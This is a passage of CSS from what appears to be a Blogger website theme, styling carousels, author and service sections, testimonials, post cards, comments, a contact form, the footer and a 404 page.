relative; background-size: cover; background-position: 50%; background-repeat: no-repeat; } .counter-image-wrap, .counter-image-wrap .widget, .counter-image-wrap .widget-content, .counter-image-wrap .counter-content { height: 100%; } #intro-author-wrap{ display:none; position:relative; float:left; width:100%; padding:0; margin:0; background-color: #f9f9f9; } #intro-author-wrap .container{ position:relative; margin:0 auto } #intro-author-heading { width: 100%; float: left; display:block; position:relative; padding: 80px 0; margin-bottom:30px; text-align:center; background: #f9f9f9; } #intro-author-heading .author-title { color:#1b2024; } #intro-author-heading .author-snippet { color:#666666; } #intro-author-heading .button { margin: 10px 0 0; padding: 8px 20px; background: $(dark.color); color:#fff; display: inline-block; float: none; } #intro-author-heading .button:hover { background: $(main.color); } .author-intro-widgets { margin: 0 0 30px; display: grid; grid-template-columns: repeat(3,1fr); grid-gap: 15px; } .author-intro-widgets .left-side-widget, .author-intro-widgets .center-side-widget, .author-intro-widgets .right-side-widget { display: flex; flex-direction: column; width: 100%; box-sizing: border-box; text-align: center; padding: 0; box-sizing: border-box; position:relative; padding: 20px; background-color: #ffffff; border-radius: 8px; box-shadow: 0px 2px 40px 0px rgba(0, 0, 0, 0.08); } .author-intro-widgets .right-side-widget { } .author-intro-widgets .author-list .widget { display: block; list-style: none; width:100%; float: left; margin:0; box-sizing: border-box; position:relative; } #intro-author-photo{ position:relative; float:left; width:100%; height:400px; box-sizing:border-box; padding:0 10px } #intro-author-photo .author-image{ position:relative; display:block; width:100%; height:100%; background-repeat:no-repeat; background-size:cover; margin:0 } .author-title{ display:block; font-size:40px; color:#ffffff; font-weight:700; margin:15px 0 20px } .author-snippet{ font-size:14px; color:#f2f2f2; line-height:24px; margin:0 } #intro-services-wrap{ display:none; float:left; width:100%; background-color:#f8f8f8; padding:80px 0 } #intro-services-wrap .container{ position:relative; margin:0 auto } #intro-services{ display:block; margin:0 -20px } #intro-services .widget{ float:left; width:calc(100% / 3); box-sizing:border-box; padding:0 20px } .service-content{ display:block; text-align:center } #intro-services .service-icon{ display:inline-block; width:70px; height:70px; text-align:center; border-radius:100%; overflow:hidden } #intro-services .service-icon img{ display:block; width:100%; height:100%; object-fit:cover; border-radius:100%; color:transparent } #intro-services .service-icon i{ display:block; background-color:#f2f2f2; font-size:30px; color:$(main.color); line-height:70px; font-weight:400; font-style:normal; margin:0 } .author-intro-widgets .author-list .service-content-details { position: relative; z-index: 1; float: left; width: 100%; padding: 30px; } .author-intro-widgets .author-list .service-content-details .service-snippet { color: #99A2AC; font-size: 13px; line-height: 22px; display:none; } .author-intro-widgets .left-side-widget .service-content { text-align:right; } .author-intro-widgets .author-list .service-content { text-align: left; padding: 0; position: relative; box-sizing: border-box; } .author-intro-widgets .service-content .service-content-box-color { float: left; width: 100%; height: 250px; margin: 0; position: relative; display: block; box-sizing: border-box; } .author-intro-widgets .service-content .service-content-box-color img { display: block; position: relative; width: 100%; height: 100%; color: transparent; object-fit: cover; z-index: 1; } .service-title{ font-size:14px; color:$(dark.color); font-weight:700; text-transform:capitalize; margin:25px 0 15px } .author-intro-widgets .author-list .service-title{ font-size: 28px; line-height: 1.2; margin:0 0 10px; color:#14212a; } overflow:hidden; } .service-snippet{ font-size:14px; line-height:24px; margin:0 } .owl-carousel{ display:none; width:100%; -webkit-tap-highlight-color:transparent; position:relative; z-index:1 } .owl-carousel .owl-stage{ position:relative; -ms-touch-action:pan-Y } .owl-carousel .owl-stage:after{ content:"."; display:block; clear:both; visibility:hidden; line-height:0; height:0 } .owl-carousel .owl-stage-outer{ position:relative; -webkit-transform:translate3d(0px,0px,0px) } .owl-carousel .owl-controls .owl-nav .owl-prev,.owl-carousel .owl-controls .owl-nav .owl-next,.owl-carousel .owl-controls .owl-dot{ cursor:pointer; cursor:hand; -webkit-user-select:none; -khtml-user-select:none; -moz-user-select:none; -ms-user-select:none; user-select:none } #slider-wrapper .PopularPosts .main-slider, #slider-wrapper .PopularPosts .main-slider .slider-item { height: 395px; overflow: hidden; } #slider-wrapper .PopularPosts .main-slider.owl-carousel.owl-loaded, #slider-wrapper .PopularPosts .main-slider.owl-carousel.owl-loaded .slider-item { height: auto; } .owl-carousel.owl-loaded{ display:block } .owl-carousel.owl-loading{ opacity:0; display:block } .owl-carousel.owl-hidden{ opacity:0 } .owl-carousel .owl-refresh .owl-item{ display:none } .owl-carousel .owl-item{ position:relative; min-height:1px; float:left; opacity:0; -webkit-backface-visibility:visible; -webkit-tap-highlight-color:transparent; -webkit-touch-callout:none; -webkit-user-select:none; -moz-user-select:none; -ms-user-select:none; user-select:none; transition: all 4s ease; } .owl-carousel .owl-item.active, .owl-carousel .owl-item.cloned.active { opacity:1; transition: all 1s ease; } .owl-carousel .owl-item img{ display:block; width:100%; -webkit-transform-style:preserve-3d; transform-style:preserve-3d } .owl-carousel.owl-text-select-on .owl-item{ -webkit-user-select:auto; -moz-user-select:auto; -ms-user-select:auto; user-select:auto } .owl-carousel .owl-grab{ cursor:move; cursor:-webkit-grab; cursor:-o-grab; cursor:-ms-grab; cursor:grab } .owl-carousel.owl-rtl{ direction:rtl } .owl-carousel.owl-rtl .owl-item{ float:right } .no-js .owl-carousel{ display:block } .owl-carousel .animated{ -webkit-animation-duration:1000ms; animation-duration:1000ms; -webkit-animation-fill-mode:both; animation-fill-mode:both } .owl-carousel .owl-animated-in{ z-index:1 } .owl-carousel .owl-animated-out{ z-index:0 } .owl-height{ -webkit-transition:height 500ms ease-in-out; -moz-transition:height 500ms ease-in-out; -ms-transition:height 500ms ease-in-out; -o-transition:height 500ms ease-in-out; transition:height 500ms ease-in-out } .owl-prev,.owl-next{ position:relative; float:left; width:25px; height:30px; background-color:#fff; font-family: FontAwesome; text-rendering: auto; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-size:11px; line-height:30px; font-weight:900; color:$(dark.color); text-align:center; cursor:pointer; border:1px solid rgba(0,0,0,0.08); box-sizing:border-box; transition:all .25s ease } .owl-prev:before{ content:"\f053" } .owl-next:before{ content:"\f054" } .owl-prev:hover,.owl-next:hover{ background-color:$(main.color); color:#fff; border-color:$(main.color) } @keyframes fadeInLeft { from{ opacity:0; transform:translate3d(-30px,0,0) } to{ opacity:1; transform:none } } @keyframes fadeOutLeft { from{ opacity:1 } to{ opacity:0; transform:translate3d(-30px,0,0) } } @keyframes fadeInRight { from{ opacity:0; transform:translate3d(30px,0,0) } to{ opacity:1; transform:none } } .fadeInRight{ animation-name:fadeInRight } @keyframes fadeOutRight { from{ opacity:1 } to{ opacity:0; transform:translate3d(30px,0,0) } } .fadeOutRight{ animation-name:fadeOutRight } .loader{ position:relative; height:280px; overflow:hidden; display:block; margin:0 } .loader:after{ content:''; position:absolute; top:50%; left:50%; width:28px; height:28px; margin:-16px 0 0 -16px; border:2px solid $(main.color); border-right-color:rgba(155,155,155,0.2); border-radius:100%; animation:spinner 1.1s infinite linear; transform-origin:center } @-webkit-keyframes spinner { 0%{ -webkit-transform:rotate(0deg); transform:rotate(0deg) } to{ -webkit-transform:rotate(1turn); transform:rotate(1turn) } } @keyframes spinner { 0%{ -webkit-transform:rotate(0deg); transform:rotate(0deg) } to{ -webkit-transform:rotate(1turn); transform:rotate(1turn) } } #slider-wrapper .show-slider, #slider-wrapper .PopularPosts{ display:block!important } #slider-wrapper .show-slider .widget-content, #slider-wrapper .PopularPosts .widget-content{ position:relative; height:auto; overflow:hidden; margin:30px 0 0; } #slider-wrapper { margin: 0 auto; } #slider-section .widget, #slider-section .widget > .widget-title { display: none; } #slider-wrapper .PopularPosts .main-slider { display: grid; grid-template-columns: repeat(3,1fr); grid-gap: 10px; } #slider-wrapper .PopularPosts ul.main-slider.owl-carousel.owl-loaded { display: block; } .main-slider{ position:relative; overflow:hidden; height:auto } .main-slider .slider-item{ position:relative; float:left; width:100%; height:auto; overflow:hidden; box-sizing:border-box } #slider-wrapper .PopularPosts .main-slider .slider-item { display: flex; flex-direction: column; overflow: hidden; } #slider-wrapper .PopularPosts ul.main-slider.owl-carousel.owl-loaded .slider-item { display: block; } .slider-item-inner{ position:relative; float:left; width:100%; height:100%; overflow:hidden; display:block; } .main-slider .post-image-link{ width:100%; height:280px; position:relative; overflow:hidden; display:block; margin-bottom:20px; background-image:linear-gradient(-45deg,rgba(0,0,0,0.1),#ededed,rgba(0,0,0,0.1));background-size:150% 150%;animation:gradient 1s ease infinite } @keyframes gradient { 0%{background-position:100% 50%} 50%{background-position:50% 0} 100%{background-position:100% 50%} } .main-slider .post-info-wrap { width: 100%; text-align: left; overflow: hidden; z-index: 5; box-sizing: border-box; padding:0; transition: transform .5s ease; } .main-slider .owl-item.active .post-info-wrap { } .main-slider .post-info{ position: relative; overflow: hidden; display: block; z-index: 10; } .main-slider .post-title{ font-size:21px; font-weight:500; display:block; line-height:1.5; margin:0 0 5px } .main-slider .post-title a{ color:$(title.color); display:block } .main-slider .post-title a:hover{ text-decoration:underline } .main-slider .post-snippet { color:$(posts.text.color); } .show-slider .no-posts{ position:absolute; top:calc(50% - 50px); left:0; width:100%; text-align:center; } .main-slider .post-info .post-tag{ display: flex; color: #4d4d4d; font-size: 9px; letter-spacing: 2px; font-weight: 400; text-transform:uppercase; margin-bottom:15px; } .main-slider .post-info .post-tag:hover{ color:$(main.color); } .main-slider .post-meta { color: #aaaaaa; font-size: 12px; font-weight: 400; line-height: 18px; padding: 0 1px; } .main-slider .post-date { font-size: 11px; color: $(dark.color); margin: 0; display: inline-block; float:none; } .main-slider .owl-nav{ position:absolute; top:0; left:0; right:0; height:0 } .main-slider .owl-prev,.main-slider .owl-next{ height:40px; line-height:40px; z-index:10; border:0 } .main-slider .owl-prev{ float:left; left:-25px; } .main-slider:hover .owl-prev{ left:0 } .main-slider .owl-next{ float:right; right:-25px; } .main-slider:hover .owl-next{ right:0 } .head-text{ float:left; width:100%; text-align:center; margin:50px 0 50px } .head-text .widget-title > h3{ display:block; font-size:27px; color:$(title.color); font-weight:700; margin:0 0 20px } .head-text .widget-content{ font-size:14px; margin:0 } #testimonial-wrap .head-text { text-align: left; } #testimonial-wrap .head-text .widget-title > h3 { color:#1b2024; } #testimonial-wrap .head-text .widget-content{ color:#222222; } .project-head { margin:0 auto; } #serv-tile-wrap{ background-color: #f9f9f9; display:none; float:left; width:100%; margin:0; padding: 40px 0; } #serv-tile-wrap .container{ position:relative; margin:0 auto } #serv-tile{ display: grid; grid-template-columns: repeat(3,1fr); grid-gap: 15px; margin:0; counter-reset: item; } #serv-tile .widget{ display: flex; flex-direction: column; width: 100%; padding: 60px 37px; box-sizing: border-box; text-align:center; box-shadow: 0px 2px 40px 0px rgba(0, 0, 0, 0.05); background: #ffffff; position:relative; } #serv-tile .widget:before { content: counter(item, decimal-leading-zero) " "; counter-increment: item; position: absolute; bottom: 0; right: 15px; font-size: 50px; font-weight: 700; color: #f2f2f2; } .serv-tile-box-avatar { display: inline-block; position: relative; width: 80px; height: 80px; border-radius: 16px; background-color: #14212a; text-align: center; line-height: 80px; margin: 0 auto 25px; } .serv-tile-box-avatar i { display: block; line-height: 80px; font-size: 30px; font-weight: 400; font-style: normal; margin: 0; color: #ffffff; } .serv-tile-box-avatar img{ width: 80px; height: 80px; } .serv-tile-box-info{ margin-top: 25px; overflow:hidden } .serv-tile-box-title{ font-size: 24px; color:#1b2024; font-weight:700; margin:0 0 7px } .serv-tile-box-meta{ font-size:16px; line-height: 1.75; color:#777777 } .owl-carousel{ display:none; width:100%; -webkit-tap-highlight-color:transparent; position:relative; z-index:1 } .owl-nav { } .owl-carousel .owl-stage{ position:relative; -ms-touch-action:pan-Y } .owl-carousel .owl-stage:after{ content:"."; display:block; clear:both; visibility:hidden; line-height:0; height:0 } .owl-carousel .owl-stage-outer{ position:relative; -webkit-transform:translate3d(0px,0px,0px) } .owl-carousel .owl-controls .owl-nav .owl-prev,.owl-carousel .owl-controls .owl-nav .owl-next,.owl-carousel .owl-controls .owl-dot{ cursor:pointer; cursor:hand; -webkit-user-select:none; -khtml-user-select:none; -moz-user-select:none; -ms-user-select:none; user-select:none } .owl-carousel.owl-hidden{ opacity:0 } .owl-carousel .owl-refresh .owl-item{ display:none } .owl-carousel.owl-loading{ opacity:0; display:block } .owl-carousel.owl-loaded{ display:block } .owl-carousel .owl-item{ position:relative; min-height:1px; float:left; -webkit-backface-visibility:visible; -webkit-tap-highlight-color:transparent; -webkit-touch-callout:none; -webkit-user-select:none; -moz-user-select:none; -ms-user-select:none; user-select:none } .owl-carousel .owl-item img, ul.customer-logos img{ display:block; } .owl-carousel.owl-text-select-on .owl-item{ -webkit-user-select:auto; -moz-user-select:auto; -ms-user-select:auto; user-select:auto } .owl-carousel .owl-grab{ cursor:move; cursor:-webkit-grab; cursor:-o-grab; cursor:-ms-grab; cursor:grab } .owl-carousel.owl-rtl{ direction:rtl } .owl-carousel.owl-rtl .owl-item{ float:right } .no-js .owl-carousel{ display:block } .owl-carousel .animated{ -webkit-animation-duration:1000ms; animation-duration:1000ms; -webkit-animation-fill-mode:both; animation-fill-mode:both } .owl-carousel .owl-animated-in{ z-index:1 } .owl-carousel .owl-animated-out{ z-index:0 } .owl-carousel .owl-item li { padding: 0; } .owl-height{ -webkit-transition:height 500ms ease-in-out; -moz-transition:height 500ms ease-in-out; -ms-transition:height 500ms ease-in-out; -o-transition:height 500ms ease-in-out; transition:height 500ms ease-in-out } .owl-carousel .owl-controls .owl-dots { margin-top: 25px; text-align: center; } .owl-carousel .owl-controls .owl-dot { display: inline-block; } .owl-carousel .owl-controls .owl-dots span { background: none repeat scroll 0 0 #869791; border-radius: 20px; display: block; height: 12px; margin: 5px 7px; opacity: 0.5; width: 12px; } .owl-carousel .owl-controls .owl-dot.active span { background:none repeat scroll 0 0 $(main.color); } .owl-prev,.owl-next{ position:relative; float:left; width:24px; height:24px; background-color:#fff; font-family: FontAwesome; text-rendering: auto; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-size:11px; line-height:23px; font-weight:900; color:#bdbdbd; text-align:center; cursor:pointer; border:1px solid rgba(0,0,0,0.08); box-sizing:border-box; transition:all .25s ease } .owl-prev:before{ content:"\f053" } .owl-next:before{ content:"\f054" } .owl-prev:hover,.owl-next:hover{ background-color:$(main.color); color:#fff; border-color:$(main.color) } @keyframes fadeInLeft { from{ opacity:0; transform:translate3d(-30px,0,0) } to{ opacity:1; transform:none } } @keyframes fadeOutLeft { from{ opacity:1 } to{ opacity:0; transform:translate3d(-30px,0,0) } } @keyframes fadeInRight { from{ opacity:0; transform:translate3d(30px,0,0) } to{ opacity:1; transform:none } } .fadeInRight{ animation-name:fadeInRight } @keyframes fadeOutRight { from{ opacity:1 } to{ opacity:0; transform:translate3d(30px,0,0) } } .fadeOutRight{ animation-name:fadeOutRight } #testimonial-wrap{ display:none; float:left; width:100%; margin:75px 0 0; background:#ffffff; position:relative; } #testimonial-wrap:before { content: ""; position: absolute; left: 0; top: 0; width: 55%; height: 100%; border-top-right-radius: 30px; border-bottom-right-radius: 30px; background-color: #ffdc39; } #testimonial-wrap .container{ position:relative; margin:0 auto } #testimonial{ float:left; width:100%; margin:0 } #testimonial .widget{ position: relative; float: left; width: 100%; overflow: hidden; padding: 35px; box-sizing: border-box; background-color: #ffffff; border-radius: 12px; box-shadow: 6px 0px 19px 0px rgb(0 0 0 / 8%); } #testimonial .widget:nth-child(2), #testimonial .widget:nth-child(4){ } .testi-avatar{ float:left; width:45px; height:45px; overflow:hidden; border-radius:50%; margin:0 15px 0 0 } .testi-avatar img{ display:block; width:100%; height:100%; object-fit:cover; color:transparent; margin:0 } .testi-info{ overflow:hidden } .testi-title{ font-size:20px; color:#1b2024; font-weight:700; margin:0 0 3px } .testi-meta{ font-size:12px; color:#1b2024 } .testi-info-quotes { margin-bottom: 26px; } .testi-snippet{ font-size: 15px; line-height: 1.8; color: #777777; padding: 15px 0; margin:0; font-style: italic; font-family: monospace; letter-spacing: 0.5px; } .testi-snippet:before { content: '\f10d'; display: inline-block; font-family: FontAwesome; font-style: normal; font-weight: 400; line-height: 1; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; margin-right: 10px; color:$(main.color); } .testi-snippet:after { content: '\f10e'; display: inline-block; font-family: FontAwesome; font-style: normal; font-weight: 400; line-height: 1; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; margin-left: 10px; color:$(main.color); } #testimonial .widget:nth-child(2) .testi-snippet, #testimonial .widget:nth-child(4) .testi-snippet { background-color: #e22310; border-color: #d41f0d; } .main .widget{ position:relative } .queryMessage{ overflow:hidden; color:$(title.color); font-size:13px; font-weight:400; padding: 10px; margin: 0 0 25px; background-color: #eee; border: 1px solid #ccc; box-sizing: border-box; } .queryMessage .search-query,.queryMessage .search-label{ font-weight:600; text-transform:uppercase } .queryMessage .search-query:before,.queryMessage .search-label:before{ content:"\201c" } .queryMessage .search-query:after,.queryMessage .search-label:after{ content:"\201d" } .queryMessage a.show-more{ float: right; display:inline-block; color:$(main.color); text-decoration:underline; margin:0 0 0 10px } .queryEmpty{ font-size:13px; font-weight:400; padding:10px 0; margin:0 0 25px; text-align:center } .blog-post{ display:block; overflow:hidden; word-wrap:break-word } .index-post-wrap { position: relative; float: left; width: 100%; } .grid-posts { display: grid; grid-template-columns: repeat(3,1fr); grid-gap: 30px; margin: 0; } .index-post{ display: flex; flex-direction: column; width: 100%; box-shadow: 0 5px 30px 0 rgb(214 215 216 / 57%); border-radius: 10px; background: #fff; box-sizing: border-box; padding:15px; margin:0; overflow: visible; } .index-post .post-image-wrap{ float: left; width: 100%; height: 200px; margin: 0; border-radius: 10px; overflow: hidden; } .index-post .post-image-wrap .post-image-link{ width:100%; height:100%; position:relative; display:block; z-index:1; -webkit-border-radius: 4px 4px 0 0; -khtml-border-radius: 4px 4px 0 0; -moz-border-radius: 4px 4px 0 0; -ms-border-radius: 4px 4px 0 0; -o-border-radius: 4px 4px 0 0; border-radius: 4px 4px 0 0; overflow:hidden } .index-post .post-content{ margin:0; float: left; width: 100%; } .post-image-wrap:hover .post-content{ } .index-post .post-info{ display: block; float:left; width:100%; padding: 15px 30px 35px; box-sizing: border-box; min-height: 200px; } .index-post .post-info > h2{ font-size:24px; color:$(title.color); font-weight:600; line-height:1.5em; margin:0 0 10px } .index-post .post-info > h2 a{ color:$(title.color); } .post-meta{ color:#989898; font-weight:400; font-size: 11px; text-transform: capitalize; padding:0; } .index-post .post-meta .post-author{ } .index-post .post-meta .post-author:before { } .post-meta .post-date{ display:inline-block; margin:0 7px 0 0 } .post-meta .post-author, .post-meta .post-date { float: left; display: inline-block; margin: 0 10px 0 0; } .post-meta .post-author:before, .post-meta .post-date:before, .post-meta .post-tag:before { font-family: FontAwesome; font-weight: 400; margin: 0 3px 0 0; } .post-meta .post-author:before { content: '\f007'; } .post-meta .post-date:before { content: '\f017'; } .post-meta .post-tag:before { content: '\f022'; } .post-meta a { color: #989898; transition: color .17s; } .post-snippet { position: relative; display: block; overflow: hidden; font-size: 14px; line-height: 1.6em; font-weight: 400; margin: 7px 0 0; color: #5a5a5a; } .widget iframe,.widget img{ max-width:100% } .item-post h1.post-title{ font-size:27px; color:$(title.color); line-height:1.5em; font-weight:700; position:relative; display:block; margin:0 0 15px } .static_page .item-post h1.post-title{ margin:0 } .item-post .post-header .post-meta{ font-size:13px } .item-post .post-body{ display:block; font-size:14px; line-height:1.6em; padding:35px 0 0 } .static_page .item-post .post-body{ padding:35px 0 } .item-post .post-outer{ padding:0 } .item-post .post-body img{ max-width:100% } .post-footer{ position:relative; float:left; width:100%; margin:35px 0 40px } .post-labels{ float:left; height:auto; position:relative } .post-labels a{ float:left; height:26px; background-color:#f9f9f9; color:#aaa; font-size:11px; font-weight:600; text-transform:uppercase; line-height:26px; padding:0 10px; margin:0 10px 0 0; border-radius:3px; transition:all .17s ease } .post-labels a:hover{ background-color:$(main.color); color:#fff } .post-share{ position:relative; float:right; overflow:hidden; line-height:0 } ul.share-links{ position:relative } .share-links li{ float:left; box-sizing:border-box; margin:0 0 0 5px } .share-links li.whatsapp-mobile{ display:none } .is-mobile li.whatsapp-desktop{ display:none } .is-mobile li.whatsapp-mobile{ display:inline-block } .share-links li a{ float:left; display:inline-block; width:35px; height:26px; color:#fff; font-size:12px; text-align:center; line-height:26px; border-radius:3px; transition:all .17s ease } .share-links li a:before{ font-size:14px } .share-links li a:hover{ background-color:$(main.color); color:#fff } #related-wrap{ margin: 20px 0 30px; overflow: hidden; float: left; width: 100%; } #related-wrap .title-wrap { position: relative; float: left; width: 100%; height: 28px; background-color: $(main.color); display: block; margin: 0 0 20px; } #related-wrap .title-wrap > h3 { display: block; font-size: 12px; color: #ffffff; font-weight: 600; line-height: 28px; text-transform: uppercase; text-align: center; padding: 0 15px; margin: 0; } #related-wrap .related-tag{ display:none } .related-ready{ float:left; width:100% } .related-ready .loader{ height:178px } ul.related-posts{ position:relative; overflow:hidden; margin:0 -10px; padding:0 } .related-posts .related-item{ width:33.33333333%; position:relative; overflow:hidden; float:left; display:block; box-sizing:border-box; padding:0 10px; margin:0 } .related-posts .post-image-link{ width:100%; height:130px; position:relative; overflow:hidden; display:block } .related-posts .post-title{ font-size:13px; font-weight:600; line-height:1.5em; display:block; margin:7px 0 5px } .related-posts .post-title a{ color:$(dark.color); transition:color .17s } .related-posts .related-item:hover .post-title a{ color:$(main.color) } .related-posts .post-meta{ font-size:12px } .post-nav{ position:relative; overflow:hidden; display:block; margin:0 } .post-nav .nav-link{ display:block; height:30px; background-color:#f9f9f9; font-size:11px; color:#aaa; line-height:30px; text-transform:uppercase; font-weight:600; padding:0 25px; border-radius:3px; transition:all .17s ease } .post-nav .nav-link:hover{ background-color:$(main.color); color:#fff } .post-nav span.nav-link:hover{ background-color:#f8f8f8; color:#999 } .next-post-link{ float:left } .prev-post-link{ float:right } .next-post-link:after{ content:"\f104"; float:left; font-family:FontAwesome; font-size:13px; font-weight:400; text-transform:none; margin:0 3px 0 0 } .prev-post-link:before{ content:"\f105"; float:right; font-family:FontAwesome; font-size:13px; font-weight:400; text-transform:none; margin:0 0 0 3px } #blog-pager{ float:left; width:100%; text-align:center; margin:16px 0 0 } .blog-pager a{ display:inline-block; height:32px; background-color:$(main.color); color:#fff; font-size:14px; font-weight:400; line-height:32px; text-transform:capitalize; text-align:center; padding:0 20px; border-radius:3px; transition:all .17s ease } .blog-pager a:hover{ background-color:$(dark.color) } .blog-post-comments{ display:none; overflow:hidden; background-color:#f8f8f8; padding:10px 30px; margin:0 0 40px } #comments{ margin:0 } #gpluscomments{ float:left!important; width:100%!important; margin:0 0 25px!important } #gpluscomments iframe{ float:left!important; width:100% } .comments{ display:block; clear:both; margin:0 } .comments > h3{ float:left; width:100%; font-size:12px; font-style:italic; font-weight:400; margin:0 0 20px } .no-comments > h3{ margin:10px 0 15px } .comments .comments-content{ float:left; width:100%; margin:0 } #comments h4#comment-post-message{ display:none } .comments .comment-block{ position:relative; background-color:#fdfdfd; padding:15px; margin:0 0 0 55px; border:1px solid #f2f2f2 } .comments .comment-block:before{ content:''; position:absolute; top:8px; left:-5px; width:0; height:0; border:5px solid #f2f2f2; border-top-color:transparent; border-right-color:transparent; transform:rotate(45deg) } .comments .comment-content{ font-size:13px; line-height:1.6em; margin:10px 0 } .comment-thread .comment{ position:relative; padding:10px 0 0; margin:10px 0 0; list-style:none } .comment-thread ol{ padding:0; margin:0 0 20px } .comment-thread ol > li:first-child{ padding:0; margin:0 } .comment-thread .avatar-image-container{ position:absolute; top:10px; left:0; width:40px; height:40px; overflow:hidden } .comment-thread ol > li:first-child > .avatar-image-container{ top:0 } .avatar-image-container img{ width:100%; height:100% } .comments .comment-header .user{ font-size:14px; color:$(title.color); display:inline-block; font-style:normal; font-weight:700; margin:0 } .comments .comment-header .user a{ color:$(title.color); transition:color .17s ease } .comments .comment-header .user a:hover{ color:$(main.color) } .comments .comment-header .icon.user{ display:none } .comments .comment-header .icon.blog-author{ display:inline-block; font-size:12px; color:$(main.color); font-weight:400; vertical-align:top; margin:0 0 0 5px } .comments .comment-header .icon.blog-author:before{ content:'\f058'; font-family:FontAwesome } .comments .comment-header .datetime{ float:right; display:inline-block; margin:0 } .comment-header .datetime a{ font-size:12px; color:#aaa; font-style:italic } .comments .comment-actions{ display:block; margin:0 } .comments .comment-actions a{ color:#aaa; font-size:11px; font-style:italic; margin:0 15px 0 0; transition:color .17s ease } .comments .comment-actions a:hover{ color:$(main.color); text-decoration:underline } .loadmore.loaded a{ display:inline-block; border-bottom:1px solid rgba(0,0,0,0.1); text-decoration:none; margin-top:15px } .comments .continue{ display:none!important } .comments .comment-replies{ padding:0 0 0 55px } .thread-expanded .thread-count a,.loadmore{ display:none } .comments .footer,.comments .comment-footer{ font-size:13px } .comment-form{ margin:0 -7.5px } .comment-form > p{ font-size:13px; padding:10px 0 5px } .comment-form > p > a{ color:$(title.color) } .comment-form > p > a:hover{ text-decoration:underline } .post-body h1,.post-body h2,.post-body h3,.post-body h4,.post-body h5,.post-body h6{ color:$(title.color); font-weight:700; margin:0 0 15px } .post-body h1,.post-body h2{ font-size:24px } .post-body h3{ font-size:21px } .post-body h4{ font-size:18px } .post-body h5{ font-size:16px } .post-body h6{ font-size:13px } blockquote{ background-color:#f8f8f8; font-style:italic; padding:10px 15px; margin:0; border-left:3px solid $(main.color) } blockquote:before,blockquote:after{ display:inline-block; font-family:FontAwesome; font-weight:400; font-style:normal; line-height:1 } blockquote:before{ content:'\f10d'; margin:0 10px 0 0 } blockquote:after{ content:'\f10e'; margin:0 0 0 10px } .widget .post-body ul,.widget .post-body ol{ line-height:1.5; font-weight:400 } .widget .post-body li{ margin:5px 0; padding:0; line-height:1.5 } .post-body ul{ padding:0 0 0 20px } .post-body ul li:before{ content:"\f105"; font-family:FontAwesome; font-size:13px; font-weight:900; margin:0 5px 0 0 } .post-body u{ text-decoration:underline } .post-body a{ transition:color .17s ease } .post-body strike{ text-decoration:line-through } .contact-form-widget form{ font-weight:400 } .contact-form-name,.contact-form-email{ float:left; width:calc(50% - 5px); height:34px; background-color:rgba(255,255,255,0.01); font-family:inherit; font-size:13px; color:#fff; line-height:34px; box-sizing:border-box; padding:0 10px; margin:0 0 10px; border:1px solid #ddd; border-radius:3px } .contact-form-email{ float:right } .contact-form-email-message{ float:left; width:100%; background-color:rgba(255,255,255,0.01); font-family:inherit; font-size:13px; color:#fff; box-sizing:border-box; padding:10px; margin:0 0 10px; border:1px solid #ddd; border-radius:3px } .contact-form-button-submit{ float:left; width:100%; height:34px; background-color:$(main.color); font-family:inherit; font-size:12px; color:#fff; line-height:34px; font-weight:600; text-transform:uppercase; cursor:pointer; box-sizing:border-box; padding:0 10px; margin:0; border:0; border-radius:3px; transition:background .17s ease } .contact-form-button-submit:hover{ background-color:rgba(0,0,0,0.5) } .contact-form-error-message-with-border,.contact-form-success-message-with-border{ float:left; width:100%; background-color:#e74c3c; color:#f2f2f2; font-size:11px; text-align:center; line-height:11px; padding:4px 0; margin:10px 0; border-radius:3px } .contact-form-success-message-with-border{ background-color:#3498db } .contact-form-cross{ margin:0 0 0 3px } .contact-form-error-message,.contact-form-success-message{ margin:0 } .map-me { margin:0 0 -5px; display: block; max-width: 100%; width: 100%; box-sizing: border-box; } .map-me #map iframe { width: 100%; height: 378px; } #footer-wrapper-bg { background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh1ldo4prODExlOOkiMinAQBRxxqTOdPamIEFcV3vnVyfdavS30Wxnr7Bbiv1xecFS_GQuGiM7e2LCBzUbL0iNvQZ6rjmkGKEoTcceM1tcPM8Ab93PdoHfHgctj2JI0gTT94MmRfUTwUKKuJLtAi6SJbUHbVg6jRrEgR_2Y4bjtT18xpD57PLa6dq8/s16000/footerbottom_bg.jpg); background-repeat: no-repeat; background-size: cover; background-attachment: scroll; background-position: 100% 0; box-shadow: 0 0 0 0 #ffffff; } #footer-wrapper{ position:relative; overflow:hidden; background-size: cover; background-position: top; margin:0 } #footer-copyright{ border-style: solid; border-width: 1px 0 0; border-color: #ffffff29; display:block; overflow:hidden; width:100%; color:#aaa; padding:20px 0 } #footer-copyright > .container{ margin:0 auto } #social-footer{ float:right } #social-footer .widget{ line-height:30px } .social-footer ul{ text-align:center; overflow:hidden; display:block } .social-footer ul li{ display:inline-block; margin:0 0 0 14px } .social-footer ul li a{ font-size:16px; color:#aaa; display:block; padding:0 3px; transition:color .17s ease } .social-footer ul li:last-child a{ padding-right:0 } .social-footer ul li a:hover{ color:$(main.color) } #footer-copyright .copyright-area{ float:left; font-size:12px; line-height:30px; } #footer-copyright .copyright-area a{ color:$(main.color) } #footer-copyright .copyright-area a:hover{ text-decoration:underline } .hidden-widgets{ display:none; visibility:hidden } .back-top{ display:none; z-index:1010; width:32px; height:32px; position:fixed; bottom:25px; right:25px; background-color:$(main.color); cursor:pointer; overflow:hidden; font-size:19px; color:#fff; text-align:center; line-height:32px; border-radius:3px } .back-top:after{ content:'\f106'; position:relative; font-family:FontAwesome; font-weight:400 } .error404 #main-wrapper{ width:100%!important; margin:0!important } .error404 #sidebar-wrapper{ display:none } .errorWrap{ color:$(title.color); text-align:center; padding:60px 0 100px } .errorWrap h3{ font-size:130px; line-height:1; margin:0 0 30px } .errorWrap h4{ font-size:25px; margin:0 0 20px } .errorWrap p{ margin:0 0 10px } .errorWrap a{ display:block; color:$(main.color); padding:10px 0 0 } .errorWrap a i{ font-size:14px } .errorWrap a:hover{ text-decoration:underline } @media (max-width: 1040px) { .row{ width:100% } #header-wrap, .home #header-wrap, .item #header-wrap, #intro-author-wrap .container, #content-wrapper, #serv-tile-wrap .container, #contact-area > .container, #footer-copyright > .container, #top-bar .container, .counter-box .container, .featured-posts, #testimonial-wrap .container, #brand-services-wrap .container, #editorial-wrap 